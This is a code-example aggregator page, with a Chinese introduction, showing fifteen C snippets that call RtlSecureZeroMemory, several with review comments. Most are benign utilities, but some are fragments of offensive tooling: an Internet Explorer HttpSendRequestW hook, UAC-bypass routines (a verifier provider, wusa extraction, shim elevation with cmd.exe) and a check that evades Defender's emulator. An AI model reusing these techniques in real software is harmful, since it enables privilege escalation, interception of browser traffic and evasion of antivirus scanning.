本文整理汇总了C++中RtlSecureZeroMemory函数的典型用法代码示例。如果您正苦于以下问题:C++ RtlSecureZeroMemory函数的具体用法?C++ RtlSecureZeroMemory怎么用?C++ RtlSecureZeroMemory使用的例子?那么, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了RtlSecureZeroMemory函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的C++代码示例。
示例1: InternetExplorerEntry
/*
 * InternetExplorerEntry
 *
 * Resets the global sINTERNETEXPLORERMETHODS table, resolves an address for
 * HttpSendRequestW through FindHTTPSendRequestW(), calls IEDISABLESPDY(), and,
 * if an address was resolved, passes it to SetHook() together with
 * INTERNETEXPLORERCALLBACK. The value SetHook() returns is stored in the
 * global HTTPSENDREQUESTW.
 *
 * NOTE(review): RtlSecureZeroMemory is used here only as an initializer. The
 * table holds function pointers rather than secrets, so the "secure" variant
 * gives nothing beyond a plain zero fill.
 *
 * NOTE(review): redirecting HttpSendRequestW inside a browser process exposes
 * outgoing request data to the callback. From a defensive standpoint this is
 * an in-process API hook; comparing the in-memory code of the hooked module
 * against its on-disk image is the usual way to surface one.
 */
VOID InternetExplorerEntry()
{
// Clear every slot so an unresolved entry is a NULL pointer, not stale data.
RtlSecureZeroMemory(&sINTERNETEXPLORERMETHODS,sizeof(INTERNETEXPLORERMETHODS));
sINTERNETEXPLORERMETHODS.HttpSendRequestW = FindHTTPSendRequestW();
// Helper defined elsewhere; its effect is not visible in this listing
// (the name suggests it turns SPDY off -- TODO confirm).
IEDISABLESPDY();
// Install the redirect only when the target address was actually found.
if (sINTERNETEXPLORERMETHODS.HttpSendRequestW)
{
// presumably SetHook returns a pointer for calling the original routine -- verify against SetHook
HTTPSENDREQUESTW = (PHTTPSENDREQUESTW)SetHook(INTERNETEXPLORERCALLBACK,(LPVOID)sINTERNETEXPLORERMETHODS.HttpSendRequestW);
}
}
示例2: AllocateVmxProcessorData
/*
 * AllocateVmxProcessorData
 *
 * Allocates a physically contiguous, zero-filled region, writes the VMX
 * revision identifier read from IA32_VMX_BASIC into its first 32 bits, and
 * returns both the virtual and the physical address of the region.
 *
 * VirtualAddress  - receives the virtual address of the region.
 * PhysicalAddress - receives the matching physical address.
 * Size            - in: requested size, or 0 to derive it from the MSR;
 *                   out: the size used when 0 was passed in.
 *
 * Returns STATUS_INVALID_PARAMETER if any pointer is NULL, STATUS_NO_MEMORY if
 * the allocation fails, STATUS_SUCCESS otherwise.
 *
 * The region is not released on any path here; the caller owns it after
 * success (presumably freed with MmFreeContiguousMemorySpecifyCache -- confirm
 * at the call sites).
 *
 * NOTE(review): a caller-supplied non-zero *Size is used as given, without
 * page rounding; only the derived size goes through ROUND_TO_PAGES.
 */
NTSTATUS AllocateVmxProcessorData(PVOID *VirtualAddress, PHYSICAL_ADDRESS *PhysicalAddress, SIZE_T *Size)
{
    if (VirtualAddress == NULL || PhysicalAddress == NULL || Size == NULL) {
        return STATUS_INVALID_PARAMETER;
    }

    // IA32_VMX_BASIC supplies both the region size and the revision id.
    VMX_BASIC_MSR basic;
    TO_ULL(basic) = __readmsr(MSR_IA32_VMX_BASIC);

    if (*Size <= 0) {
        // Some virtualized environments leave the size field empty; fall back
        // to one 4096-byte page in that case.
        *Size = (basic.szVmxOnRegion > 0) ? basic.szVmxOnRegion : 0x1000;
        *Size = ROUND_TO_PAGES(*Size);
    }

    // Any physical address is acceptable, cached memory is requested, and
    // the boundary argument is 0x200000.
    PHYSICAL_ADDRESS lowest, highest, boundary;
    lowest.QuadPart = 0;
    highest.QuadPart = -1;
    boundary.QuadPart = 0x200000;

    PVOID region = MmAllocateContiguousMemorySpecifyCache(*Size, lowest, highest, boundary, MmCached);
    if (region == NULL) {
        return STATUS_NO_MEMORY;
    }

    // The allocator returns uninitialized memory, so clear it before anything
    // else can observe leftover kernel data in the region.
    RtlSecureZeroMemory(region, *Size);

    // The revision identifier goes into the first 32 bits of the region.
    ((ULONG *)region)[0] = basic.RevId;

    *VirtualAddress = region;
    *PhysicalAddress = MmGetPhysicalAddress(region);
    return STATUS_SUCCESS;
}
示例3: FindDlgHandleNotify
/*
 * FindDlgHandleNotify
 *
 * Purpose:
 *
 * Handles WM_NOTIFY messages sent by the FindDlg listview.
 *
 * Messages from any control other than ID_SEARCH_LIST are ignored.
 * LVN_ITEMCHANGED on a newly selected row navigates to the object named in
 * column 0; LVN_COLUMNCLICK flips the sort direction, re-sorts by the clicked
 * column and moves the sort-arrow image to that column.
 *
 */
VOID FindDlgHandleNotify(
    LPNMLISTVIEW nhdr
    )
{
    INT      idx, imageCount;
    LPWSTR   itemText;
    LVCOLUMN lvc;

    if (nhdr == NULL || nhdr->hdr.idFrom != ID_SEARCH_LIST) {
        return;
    }

    if (nhdr->hdr.code == LVN_ITEMCHANGED) {
        // Only react when the item became selected.
        if ((nhdr->uNewState & LVIS_SELECTED) == 0) {
            return;
        }

        itemText = supGetItemText(nhdr->hdr.hwndFrom, nhdr->iItem, 0, NULL);
        if (itemText != NULL) {
            ListToObject(itemText);
            // The text came from the process heap and is released here.
            HeapFree(GetProcessHeap(), 0, itemText);
        }
        return;
    }

    if (nhdr->hdr.code == LVN_COLUMNCLICK) {
        bFindDlgSortInverse = !bFindDlgSortInverse;
        FindDlgSortColumn = nhdr->iSubItem;
        ListView_SortItemsEx(FindDlgList, &FindDlgCompareFunc, FindDlgSortColumn);

        // Strip the header image from both columns first.
        RtlSecureZeroMemory(&lvc, sizeof(lvc));
        lvc.mask = LVCF_IMAGE;
        lvc.iImage = -1;
        for (idx = 0; idx < 2; idx++) {
            ListView_SetColumn(FindDlgList, idx, &lvc);
        }

        // The sort arrows are taken from the last two images of the list;
        // which one is used depends on the current direction.
        imageCount = ImageList_GetImageCount(ListViewImages);
        lvc.iImage = bFindDlgSortInverse ? (imageCount - 2) : (imageCount - 1);
        ListView_SetColumn(FindDlgList, nhdr->iSubItem, &lvc);
    }
}
示例4: ucmRegisterProvider
/*
 * ucmRegisterProvider
 *
 * Purpose:
 *
 * Register provider and set up image load notify callback.
 *
 * What the visible code does: it clears the avrfThunks and avrfDlls tables
 * and the g_avrfProvider descriptor, links them together
 * (descriptor -> avrfDlls -> avrfThunks) and stores ucmLoadCallback as the
 * descriptor's DLL-load callback. Handing the descriptor to the loader is not
 * part of this function.
 *
 * NOTE(review): RtlSecureZeroMemory serves as a plain initializer here; no
 * secret material is involved.
 *
 * NOTE(review): a verifier provider gets its callback run for module loads in
 * the host process. Defenders typically treat unexpected verifier-provider
 * registrations for a system binary as a persistence or injection indicator.
 *
 */
VOID ucmRegisterProvider(
VOID
)
{
// Zero the whole thunk table; the explicit NULL stores that follow repeat
// what the zero fill already did for entry 0.
RtlSecureZeroMemory(&avrfThunks, sizeof(avrfThunks)); //for future case
avrfThunks[0].ThunkName = NULL;
avrfThunks[0].ThunkOldAddress = NULL;
avrfThunks[0].ThunkNewAddress = NULL;
// Same for the DLL table: entry 0 names no DLL and points at the thunk table.
RtlSecureZeroMemory(&avrfDlls, sizeof(avrfDlls)); //for future case
avrfDlls[0].DllName = NULL;
avrfDlls[0].DllFlags = 0;
avrfDlls[0].DllAddress = NULL;
avrfDlls[0].DllThunks = avrfThunks;
// Build the provider descriptor: size, DLL table and the load callback.
RtlSecureZeroMemory(&g_avrfProvider, sizeof(RTL_VERIFIER_PROVIDER_DESCRIPTOR));
g_avrfProvider.Length = sizeof(RTL_VERIFIER_PROVIDER_DESCRIPTOR);
g_avrfProvider.ProviderDlls = avrfDlls;
g_avrfProvider.ProviderDllLoadCallback = (RTL_VERIFIER_DLL_LOAD_CALLBACK)&ucmLoadCallback;
}
示例5: ucmWusaExtractPackage
/*
 * ucmWusaExtractPackage
 *
 * Purpose:
 *
 * Extract cab to protected directory using wusa.
 *
 * What the visible code does: it builds a file name from
 * g_ctx.szTempDirectory and ELLOCNAK_MSU, formats lpCommandLine with that
 * name as its single argument, runs the result through
 * supRunProcess(L"cmd.exe", ...), deletes the file and returns the value
 * supRunProcess gave back.
 *
 * NOTE(review): lpCommandLine is used as the format string of wsprintfW, so
 * it must be a trusted constant containing exactly one string specifier.
 * _strcpy/_strcat are unbounded; the fixed-size buffers rely on
 * g_ctx.szTempDirectory being short enough -- confirm where it is filled.
 *
 * NOTE(review): the staged file is deleted whatever the outcome, so on an
 * affected host the process-creation record (cmd.exe and its command line)
 * is the more durable artefact than the file itself.
 *
 */
BOOL ucmWusaExtractPackage(
LPWSTR lpCommandLine
)
{
BOOL bResult = FALSE;
WCHAR szMsuFileName[MAX_PATH * 2];
WCHAR szCmd[MAX_PATH * 4];
// Zero fill guarantees termination; the buffer holds a path, not a secret.
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
_strcpy(szMsuFileName, g_ctx.szTempDirectory);
_strcat(szMsuFileName, ELLOCNAK_MSU);
//extract msu data to target directory
RtlSecureZeroMemory(szCmd, sizeof(szCmd));
// Caller-supplied format; szMsuFileName is its only argument.
wsprintfW(szCmd, lpCommandLine, szMsuFileName);
bResult = supRunProcess(L"cmd.exe", szCmd);
// Remove the staged file regardless of bResult.
if (szMsuFileName[0] != 0) {
DeleteFileW(szMsuFileName);
}
return bResult;
}
示例6: wdCheckEmulatedVFS
/*
 * wdCheckEmulatedVFS
 *
 * Purpose:
 *
 * Detect Microsoft Security Engine emulation by its own VFS artefact.
 *
 * Microsoft AV provides a special emulated environment for the scanned
 * application, in which it fakes general system information and process
 * environment structures/data so that API calls are transparent to the
 * scanned code. It also uses a simple Virtual File System that lets the AV
 * track file system changes and, if needed, continue emulation on a new
 * target.
 *
 * This method has been implemented in commercial malware, presumably since
 * 2013.
 *
 * What the visible code does: it reads the current module's file name and
 * terminates the process with exit code 0 when that name contains the
 * marker ":\myapp.exe" (matched through _strstri).
 *
 * NOTE(review): for analysts this is an environment-keyed exit. A clean,
 * immediate exit observed under emulation says nothing about what the same
 * binary does on a real host, so a verdict should not rest on the emulated
 * run alone.
 *
 */
VOID wdCheckEmulatedVFS(
VOID
)
{
WCHAR szBuffer[MAX_PATH];
// Marker compared against the module path; spells ":\myapp.exe".
WCHAR szMsEngVFS[12] = { L':', L'\\', L'm', L'y', L'a', L'p', L'p', L'.', L'e', L'x', L'e', 0 };
// Plain initialization of the path buffer; nothing secret is being wiped.
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
// szBuffer is WCHAR, so this assumes a UNICODE build of GetModuleFileName -- confirm.
GetModuleFileName(NULL, szBuffer, MAX_PATH);
if (_strstri(szBuffer, szMsEngVFS) != NULL) {
ExitProcess((UINT)0);
}
}
示例7: SfuCreateFileMappingNoExec
/*
 * SfuCreateFileMappingNoExec
 *
 * Purpose:
 *
 * Maps a file into the current process as a non-executable image section
 * (SEC_IMAGE_NO_EXECUTE, PAGE_READONLY) and returns the view's base address.
 *
 * lpFileName - DOS path of the file to map.
 *
 * Returns the base of the mapped view, or NULL if any step failed. The file
 * and section handles are closed before returning; the view itself stays
 * mapped and is left for the caller to unmap.
 *
 * NOTE(review): mapping with SEC_IMAGE_NO_EXECUTE lets an untrusted image be
 * inspected without its code becoming executable. The section is opened with
 * SECTION_ALL_ACCESS although the view is only read; a narrower mask would
 * fit least privilege -- confirm which rights the mapping call needs.
 *
 */
PVOID SfuCreateFileMappingNoExec(
    _In_ LPWSTR lpFileName
    )
{
    NTSTATUS          status;
    UNICODE_STRING    ntPath;
    OBJECT_ATTRIBUTES attr;
    IO_STATUS_BLOCK   iosb;
    HANDLE            fileHandle = NULL;
    HANDLE            sectionHandle = NULL;
    SIZE_T            viewSize = 0;
    PVOID             viewBase = NULL;

    // Start with an empty string so the cleanup code can test Buffer safely.
    RtlSecureZeroMemory(&ntPath, sizeof(ntPath));

    if (RtlDosPathNameToNtPathName_U(lpFileName, &ntPath, NULL, NULL) == FALSE) {
        goto cleanup;
    }

    InitializeObjectAttributes(&attr, &ntPath, OBJ_CASE_INSENSITIVE, NULL, NULL);

    status = NtOpenFile(&fileHandle, FILE_READ_ACCESS | SYNCHRONIZE,
        &attr, &iosb, FILE_SHARE_READ,
        FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT);
    if (!NT_SUCCESS(status)) {
        goto cleanup;
    }

    status = NtCreateSection(&sectionHandle, SECTION_ALL_ACCESS, NULL,
        NULL, PAGE_READONLY, SEC_IMAGE_NO_EXECUTE, fileHandle);
    if (!NT_SUCCESS(status)) {
        goto cleanup;
    }

    // On failure viewBase keeps whatever the call left in it (NULL initially).
    status = NtMapViewOfSection(sectionHandle, NtCurrentProcess(),
        (PVOID)&viewBase, 0, 0, NULL, &viewSize, ViewUnmap, 0, PAGE_READONLY);

cleanup:
    // The view does not depend on the handles once it is mapped.
    if (fileHandle != NULL) {
        NtClose(fileHandle);
    }
    if (sectionHandle != NULL) {
        NtClose(sectionHandle);
    }
    if (ntPath.Buffer != NULL) {
        RtlFreeUnicodeString(&ntPath);
    }
    return viewBase;
}
示例8: r_mem_memzero
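/**
 * Overwrite a buffer with zeros in a way the compiler is not allowed to drop.
 *
 * Meant for wiping sensitive data (keys, passwords) before the memory is
 * released or reused: a plain memset() on a buffer that is never read again
 * can be removed as a dead store, leaving the data in memory.
 *
 * @param dst  start of the buffer to clear; NULL is accepted and ignored
 * @param l    number of bytes to clear; 0 is accepted and ignored
 */
R_API void r_mem_memzero(void *dst, size_t l) {
	/* Passing NULL to the fill routines below is undefined behaviour even
	 * with a zero length, so treat "nothing to wipe" as a no-op. */
	if (!dst || !l) {
		return;
	}
#if defined(_MSC_VER)
	/* Windows SDK primitive documented not to be optimized away. */
	RtlSecureZeroMemory (dst, l);
#elif HAVE_EXPLICIT_BZERO
	explicit_bzero (dst, l);
#elif HAVE_EXPLICIT_MEMSET
	(void)explicit_memset (dst, 0, l);
#else
	memset (dst, 0, l);
	/* Compiler barrier: the empty asm takes dst as an input and clobbers
	 * memory, so the preceding store cannot be treated as dead. */
	__asm__ volatile ("" :: "r"(dst) : "memory");
#endif
}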
示例9: supSetMenuIcon
/*
 * supSetMenuIcon
 *
 * Purpose:
 *
 * Attaches icon data to a menu item and marks the item's bitmap as
 * callback-drawn (HBMMENU_CALLBACK).
 *
 * hMenu    - menu that owns the item.
 * Item     - identifier of the item (looked up by command id, not position).
 * IconData - value stored as the item's application-defined data.
 *
 */
VOID supSetMenuIcon(
    HMENU hMenu,
    UINT Item,
    ULONG_PTR IconData
    )
{
    MENUITEMINFOW itemInfo;

    // Every field not set below must be zero for the call to be well defined.
    RtlSecureZeroMemory(&itemInfo, sizeof(itemInfo));

    itemInfo.cbSize     = sizeof(itemInfo);
    itemInfo.fMask      = MIIM_BITMAP | MIIM_DATA;
    itemInfo.dwItemData = IconData;
    itemInfo.hbmpItem   = HBMMENU_CALLBACK;

    // NOTE(review): the structure is the W variant, so this relies on
    // SetMenuItemInfo resolving to the wide-character function -- confirm.
    SetMenuItemInfo(hMenu, Item, FALSE, &itemInfo);
}
示例10: SfMain
/*
 * SfMain
 *
 * Program entry point: prepares console output, runs SfDecryptPayload on the
 * process command line and exits with its result. When output goes to a real
 * console the user is asked to press a key before the process ends.
 *
 * Exit code is (UINT)-1 if the standard output handle is invalid, otherwise
 * the value returned by SfDecryptPayload.
 */
void SfMain(
    VOID
    )
{
    UINT         exitCode = 0;
    DWORD        scratch;
    HANDLE       hInput;
    INPUT_RECORD pendingEvent;

    __security_init_cookie();

    g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);
    if (g_ConOut == INVALID_HANDLE_VALUE) {
        exitCode = (UINT)-1;
    }
    else {
        // GetConsoleMode fails when output is redirected to a file or pipe.
        g_ConsoleOutput = GetConsoleMode(g_ConOut, &scratch) ? TRUE : FALSE;

        SetConsoleTitle(T_SFDECRYPTTITLE);
        SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);

        // Redirected output starts with the contents of BE
        // (presumably a byte-order mark -- confirm where BE is defined).
        if (g_ConsoleOutput == FALSE) {
            WriteFile(g_ConOut, &BE, sizeof(WCHAR), &scratch, NULL);
        }

        exitCode = SfDecryptPayload(GetCommandLine());

        if (g_ConsoleOutput) {
            SfcuiPrintText(g_ConOut,
                T_SFPRESSANYKEY,
                TRUE, FALSE);

            // Hold the window open until the user provides input.
            hInput = GetStdHandle(STD_INPUT_HANDLE);
            RtlSecureZeroMemory(&pendingEvent, sizeof(pendingEvent));
            ReadConsoleInput(hInput, &pendingEvent, 1, &scratch);
            ReadConsole(hInput, &BE, sizeof(BE), &scratch, NULL);
        }
    }

    ExitProcess(exitCode);
}
示例11: ucmAppcompatElevation
/*
 * ucmAppcompatElevation
 *
 * Purpose:
 *
 * AutoElevation using Application Compatibility engine.
 *
 * What the visible code does: it loads apphelp.dll from the expanded
 * %systemroot%\system32 path into the hAppHelp variable (declared outside
 * this function), initializes its entry points through ucmInitAppHelp(), and
 * then dispatches on Method to ucmShimRedirectEXE() or ucmShimPatch().
 * Returns the result of the selected helper, or FALSE if loading or
 * initialization failed or Method matched neither case.
 *
 * NOTE(review): the library path is derived from an environment variable of
 * the current process, and hAppHelp is not released on any path shown here.
 *
 * NOTE(review): from the defensive side, the technique depends on a custom
 * shim database being created and registered; installation of unexpected
 * shim databases is the event to monitor for.
 *
 */
BOOL ucmAppcompatElevation(
UACBYPASSMETHOD Method,
CONST PVOID ProxyDll,
DWORD ProxyDllSize,
LPWSTR lpszPayloadEXE
)
{
BOOL cond = FALSE, bResult = FALSE;
WCHAR szBuffer[MAX_PATH * 2];
// Single-pass loop (cond stays FALSE): "break" is used as a structured exit.
do {
// Initialization of the path buffer; nothing secret is being wiped.
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
// Only MAX_PATH characters are offered although the buffer is twice that.
if (ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\apphelp.dll"),
szBuffer, MAX_PATH) == 0)
{
break;
}
hAppHelp = LoadLibrary(szBuffer);
if (hAppHelp == NULL) {
break;
}
if (ucmInitAppHelp() == FALSE) {
break;
}
//create and register shim with RedirectEXE, cmd.exe as payload
if (Method == UacMethodRedirectExe) {
// Without a caller-supplied target the default string below is used;
// szBuffer is reused for it.
if (lpszPayloadEXE == NULL) {
_strcpy_w(szBuffer, L"%systemroot%\\system32\\cmd.exe");
bResult = ucmShimRedirectEXE(szBuffer);
}
else {
bResult = ucmShimRedirectEXE(lpszPayloadEXE);
}
// Returns from inside the loop rather than falling through to the end.
return bResult;
}
//create and register shim patch with fubuki as payload
if (Method == UacMethodShimPatch) {
bResult = ucmShimPatch(ProxyDll, ProxyDllSize);
}
} while (cond);
return bResult;
}
示例12: TreeListAutoExpand
/*
 * TreeListAutoExpand
 *
 * Widens the first header column so that the children of the item being
 * expanded fit: it walks the visible items starting at the first child,
 * records the largest right edge seen, and sets the column width to at least
 * that edge plus 8.
 *
 * hwndHeader - header control whose item 0 is resized.
 * nhdr       - tree-view notification; itemNew.hItem is the expanded item.
 *
 * NOTE(review): nhdr is dereferenced without a NULL check.
 */
VOID TreeListAutoExpand(
    HWND hwndHeader,
    LPNMTREEVIEW nhdr
    )
{
    RECT      itemRect;
    LONG      maxRight = 0, baseLeft = 0, wanted;
    HDITEM    headerItem;
    HWND      hwndTree = nhdr->hdr.hwndFrom;
    HTREEITEM node = TreeView_GetChild(hwndTree, nhdr->itemNew.hItem);

    // The left edge of the first child is the reference indentation.
    RtlSecureZeroMemory(&itemRect, sizeof(itemRect));
    TreeView_GetItemRect(hwndTree, node, &itemRect, TRUE);
    baseLeft = itemRect.left;

    for (; node; node = TreeView_GetNextVisible(hwndTree, node)) {
        RtlSecureZeroMemory(&itemRect, sizeof(itemRect));
        TreeView_GetItemRect(hwndTree, node, &itemRect, TRUE);

        // An item further left than the first child ends the walk.
        if (itemRect.left < baseLeft) {
            break;
        }
        if (itemRect.right > maxRight) {
            maxRight = itemRect.right;
        }
    }

    // Read the current width and grow it only if needed.
    RtlSecureZeroMemory(&headerItem, sizeof(headerItem));
    headerItem.mask = HDI_WIDTH;
    Header_GetItem(hwndHeader, 0, &headerItem);

    wanted = maxRight + 8;
    if (headerItem.cxy < wanted) {
        headerItem.cxy = wanted;
    }
    Header_SetItem(hwndHeader, 0, &headerItem);
}
示例13: supQueryKnownDlls
/*
 * supQueryKnownDlls
 *
 * Purpose:
 *
 * Resolves the two KnownDllPath links and stores the results in the globals
 * g_lpKnownDlls32 and g_lpKnownDlls64. Both globals are reset to NULL first,
 * so a failed lookup leaves NULL unless supQueryKnownDllsLink writes
 * something else.
 *
 */
VOID supQueryKnownDlls(
    VOID
    )
{
    UNICODE_STRING linkName32;
    UNICODE_STRING linkName64;

    g_lpKnownDlls32 = NULL;
    g_lpKnownDlls64 = NULL;

    // 32-bit KnownDlls directory.
    RtlSecureZeroMemory(&linkName32, sizeof(linkName32));
    RtlInitUnicodeString(&linkName32, L"\\KnownDlls32\\KnownDllPath");
    supQueryKnownDllsLink(&linkName32, &g_lpKnownDlls32);

    // Native KnownDlls directory.
    RtlInitUnicodeString(&linkName64, L"\\KnownDlls\\KnownDllPath");
    supQueryKnownDllsLink(&linkName64, &g_lpKnownDlls64);
}
示例14: MainWindowOnRefresh
/*
 * MainWindowOnRefresh
 *
 * Purpose:
 *
 * Main Window Refresh handler: rebuilds the cached snapshots and the object
 * tree, then reselects the object that was current before the refresh.
 *
 * hwnd - unused.
 *
 * NOTE(review): ObListDestroy runs before the wait on the previous worker
 * thread. If kdQueryProc is still filling g_kdctx.ObjectList at that moment
 * the two could overlap -- confirm the list has its own synchronization.
 *
 */
VOID MainWindowOnRefresh(
    _In_ HWND hwnd
    )
{
    LPWSTR savedPath;
    SIZE_T cchPath;

    UNREFERENCED_PARAMETER(hwnd);

    supSetWaitCursor(TRUE);

    if (g_kdctx.hDevice != NULL) {
        ObListDestroy(&g_kdctx.ObjectList);

        // Let the previous query finish and drop its handle before starting
        // a new one.
        if (g_kdctx.hThreadWorker) {
            WaitForSingleObject(g_kdctx.hThreadWorker, INFINITE);
            CloseHandle(g_kdctx.hThreadWorker);
            g_kdctx.hThreadWorker = NULL;
        }

        //query object list info
        g_kdctx.hThreadWorker = CreateThread(NULL, 0,
            kdQueryProc,
            &g_kdctx, 0, NULL);
    }

    // Release the old snapshots, then wipe the whole structure so no pointer
    // to freed data survives until the new snapshots are stored.
    supFreeSCMSnapshot(g_enumParams.scmSnapshot);
    sapiFreeSnapshot(g_enumParams.sapiDB);
    RtlSecureZeroMemory(&g_enumParams, sizeof(g_enumParams));

    g_enumParams.scmSnapshot = supCreateSCMSnapshot(&g_enumParams.scmNumberOfEntries);
    g_enumParams.sapiDB = sapiCreateSetupDBSnapshot();
    g_enumParams.lpSubDirName = CurrentObjectPath;

    // Take a private copy of the current path before the tree is rebuilt.
    cchPath = _strlen(CurrentObjectPath);
    savedPath = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (cchPath + 1)*sizeof(WCHAR));
    if (savedPath) {
        _strcpy(savedPath, CurrentObjectPath);
    }

    TreeView_DeleteAllItems(ObjectTree);
    ListObjectDirectoryTree(L"\\", NULL, NULL);
    TreeView_SelectItem(ObjectTree, TreeView_GetRoot(ObjectTree));

    // If the copy could not be allocated the selection stays on the root.
    if (savedPath) {
        ListToObject(savedPath);
        HeapFree(GetProcessHeap(), 0, savedPath);
    }

    supSetWaitCursor(FALSE);
}
示例15: PipeDisplayError
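/*
 * PipeDisplayError
 *
 * Purpose:
 *
 * Shows the ID_PIPE_QUERYFAIL control of the dialog and fills it with
 * "Cannot open pipe because: " followed by the system text for the last
 * Win32 error.
 *
 * hwndDlg - dialog that owns the ID_PIPE_QUERYFAIL control.
 *
 */
VOID PipeDisplayError(
    HWND hwndDlg
    )
{
    DWORD dwLastError;
    WCHAR szBuffer[MAX_PATH * 2];

    // Capture the error code first; the window calls below may replace it.
    dwLastError = GetLastError();
    ShowWindow(GetDlgItem(hwndDlg, ID_PIPE_QUERYFAIL), SW_SHOW);

    // Zero fill keeps the text terminated even if FormatMessage writes nothing.
    RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
    _strcpy(szBuffer, TEXT("Cannot open pipe because: "));

    // FORMAT_MESSAGE_IGNORE_INSERTS: system message texts can contain insert
    // sequences such as %1. No argument array is supplied here, so without
    // this flag such a message would make FormatMessage process inserts that
    // have no matching arguments.
    // The MAX_PATH limit applies to the space after the prefix, which fits in
    // the MAX_PATH * 2 buffer.
    FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, dwLastError,
        0, _strend(szBuffer), MAX_PATH, NULL);

    SetDlgItemText(hwndDlg, ID_PIPE_QUERYFAIL, szBuffer);
}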